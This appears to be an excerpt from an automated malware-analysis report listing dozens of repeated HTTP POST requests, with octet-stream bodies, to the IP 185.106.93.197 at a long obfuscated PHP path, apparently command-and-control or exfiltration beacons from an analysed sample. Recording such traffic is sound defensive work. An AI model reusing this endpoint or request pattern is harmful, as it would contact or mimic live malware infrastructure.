Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1820Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 1844Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.106.93.197Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
